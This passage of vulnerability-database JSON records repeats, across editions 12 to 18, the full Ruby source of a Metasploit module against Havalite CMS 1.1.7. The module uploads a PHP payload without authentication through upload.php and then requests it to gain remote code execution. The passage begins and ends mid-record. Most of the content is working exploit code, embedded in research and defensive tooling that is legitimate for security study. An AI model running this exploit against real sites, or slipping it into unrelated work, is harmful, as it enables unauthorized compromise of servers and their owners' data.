end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-20T10:03:06", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-06T20:14:55", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-06T20:14:55", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-06T20:14:55", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-06T22:15:01", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-06T22:15:01", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-06T22:15:01", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-07T14:15:16", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-07T14:15:16", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-07T14:15:16", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-07T16:10:42", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-07T16:10:42", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-07T16:10:42", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-22T15:04:01", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-22T15:04:01", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-22T15:04:01", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-22T17:00:51", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-22T17:00:51", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-22T17:00:51", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-25T08:56:38", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-25T08:56:38", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script 